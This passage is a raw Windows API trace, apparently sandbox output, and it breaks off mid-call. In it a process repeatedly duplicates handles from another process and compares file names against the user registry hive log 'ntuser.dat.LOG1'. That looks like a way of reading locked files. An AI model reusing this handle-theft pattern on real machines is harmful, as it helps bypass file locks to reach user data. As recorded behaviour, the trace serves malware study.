[0161.053] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.054] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.054] CloseHandle (hObject=0x1e4) returned 1 [0161.054] CloseHandle (hObject=0x194) returned 1 [0161.054] CloseHandle (hObject=0x1e8) returned 1 [0161.054] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.054] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x40c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.055] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.056] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.056] CloseHandle (hObject=0x1e4) returned 1 [0161.056] CloseHandle (hObject=0x194) returned 1 [0161.056] CloseHandle (hObject=0x1e8) returned 1 [0161.056] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.056] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x438, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.056] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.057] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.058] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.058] CloseHandle (hObject=0x1e4) returned 1 [0161.058] CloseHandle (hObject=0x194) returned 1 [0161.058] CloseHandle (hObject=0x1e8) returned 1 [0161.058] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.058] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.058] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.059] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.060] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.060] CloseHandle (hObject=0x1e4) returned 1 [0161.060] _wcsicmp (_Str1="\\Microsoft-Windows-ReadyBoost%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.060] CloseHandle (hObject=0x194) returned 1 [0161.060] CloseHandle (hObject=0x1e8) returned 1 [0161.060] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.060] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.061] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.062] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.062] CloseHandle (hObject=0x1e4) returned 1 [0161.062] _wcsicmp (_Str1="\\Microsoft-Windows-GroupPolicy%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.062] CloseHandle (hObject=0x194) returned 1 [0161.062] CloseHandle (hObject=0x1e8) returned 1 [0161.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.062] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.063] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.064] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.064] CloseHandle (hObject=0x1e4) returned 1 [0161.064] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcp-Client%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.064] CloseHandle (hObject=0x194) returned 1 [0161.064] CloseHandle (hObject=0x1e8) returned 1 [0161.064] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.064] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.068] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.069] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.069] CloseHandle (hObject=0x1e4) returned 1 [0161.069] _wcsicmp (_Str1="\\Microsoft-Windows-OfflineFiles%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.069] CloseHandle (hObject=0x194) returned 1 [0161.069] CloseHandle (hObject=0x1e8) returned 1 [0161.069] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.070] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.070] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.071] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.071] CloseHandle (hObject=0x1e4) returned 1 [0161.071] _wcsicmp (_Str1="\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.071] CloseHandle (hObject=0x194) returned 1 [0161.071] CloseHandle (hObject=0x1e8) returned 1 [0161.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.071] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.072] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.073] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.073] CloseHandle (hObject=0x1e4) returned 1 [0161.073] _wcsicmp (_Str1="\\Microsoft-Windows-Winlogon%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.073] CloseHandle (hObject=0x194) returned 1 [0161.073] CloseHandle (hObject=0x1e8) returned 1 [0161.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.073] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.074] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.075] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.075] CloseHandle (hObject=0x1e4) returned 1 [0161.075] _wcsicmp (_Str1="\\Microsoft-Windows-User Profile Service%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.075] CloseHandle (hObject=0x194) returned 1 [0161.075] CloseHandle (hObject=0x1e8) returned 1 [0161.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.075] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.076] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.076] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.077] CloseHandle (hObject=0x1e4) returned 1 [0161.077] _wcsicmp (_Str1="\\Microsoft-Windows-BranchCacheSMB%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.077] CloseHandle (hObject=0x194) returned 1 [0161.077] CloseHandle (hObject=0x1e8) returned 1 [0161.077] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.077] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.078] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.078] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.079] CloseHandle (hObject=0x1e4) returned 1 [0161.079] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.079] CloseHandle (hObject=0x194) returned 1 [0161.079] CloseHandle (hObject=0x1e8) returned 1 [0161.079] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.079] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.079] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.080] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.080] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.081] CloseHandle (hObject=0x1e4) returned 1 [0161.081] _wcsicmp (_Str1="\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.081] CloseHandle (hObject=0x194) returned 1 [0161.081] CloseHandle (hObject=0x1e8) returned 1 [0161.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.081] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.082] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.082] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.083] CloseHandle (hObject=0x1e4) returned 1 [0161.083] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.083] CloseHandle (hObject=0x194) returned 1 [0161.083] CloseHandle (hObject=0x1e8) returned 1 [0161.083] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.083] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x598, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.084] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.085] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.085] CloseHandle (hObject=0x1e4) returned 1 [0161.085] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.085] CloseHandle (hObject=0x194) returned 1 [0161.085] CloseHandle (hObject=0x1e8) returned 1 [0161.085] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.085] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.086] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.086] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.086] CloseHandle (hObject=0x1e4) returned 1 [0161.087] _wcsicmp (_Str1="\\Microsoft-Windows-NCSI%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.087] CloseHandle (hObject=0x194) returned 1 [0161.087] CloseHandle (hObject=0x1e8) returned 1 [0161.087] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.087] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.091] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.092] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.092] CloseHandle (hObject=0x1e4) returned 1 [0161.092] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.092] CloseHandle (hObject=0x194) returned 1 [0161.092] CloseHandle (hObject=0x1e8) returned 1 [0161.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.092] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.093] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.094] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.094] CloseHandle (hObject=0x1e4) returned 1 [0161.094] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.094] CloseHandle (hObject=0x194) returned 1 [0161.094] CloseHandle (hObject=0x1e8) returned 1 [0161.094] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.094] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.095] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.096] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.096] CloseHandle (hObject=0x1e4) returned 1 [0161.096] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Inventory.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.096] CloseHandle (hObject=0x194) returned 1 [0161.096] CloseHandle (hObject=0x1e8) returned 1 [0161.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.096] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.097] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.098] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.098] CloseHandle (hObject=0x1e4) returned 1 [0161.098] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Problem-Steps-Recorder.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.098] CloseHandle (hObject=0x194) returned 1 [0161.098] CloseHandle (hObject=0x1e8) returned 1 [0161.098] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.098] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.099] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.100] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.100] CloseHandle (hObject=0x1e4) returned 1 [0161.100] _wcsicmp (_Str1="\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Troubleshooter.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.100] CloseHandle (hObject=0x194) returned 1 [0161.100] CloseHandle (hObject=0x1e8) returned 1 [0161.100] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.100] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.101] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.101] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.102] CloseHandle (hObject=0x1e4) returned 1 [0161.102] _wcsicmp (_Str1="\\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.102] CloseHandle (hObject=0x194) returned 1 [0161.102] CloseHandle (hObject=0x1e8) returned 1 [0161.102] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.102] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.102] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.103] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.103] CloseHandle (hObject=0x1e4) returned 1 [0161.103] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.103] CloseHandle (hObject=0x194) returned 1 [0161.103] CloseHandle (hObject=0x1e8) returned 1 [0161.103] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.103] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.104] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.105] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.105] CloseHandle (hObject=0x1e4) returned 1 [0161.105] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkProfile%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.105] CloseHandle (hObject=0x194) returned 1 [0161.105] CloseHandle (hObject=0x1e8) returned 1 [0161.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.105] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.106] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.107] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.107] CloseHandle (hObject=0x1e4) returned 1 [0161.107] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.107] CloseHandle (hObject=0x194) returned 1 [0161.107] CloseHandle (hObject=0x1e8) returned 1 [0161.107] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.107] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x600, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0161.108] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0161.109] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0161.109] CloseHandle (hObject=0x1e4) returned 1 [0161.109] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4Operational.evtx", _Str2="\\ntuser.dat.LOG1") returned -1 [0161.109] CloseHandle (hObject=0x194) returned 1 [0161.109] CloseHandle (hObject=0x1e8) returned 1 [0161.109] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0161.109] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0161.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 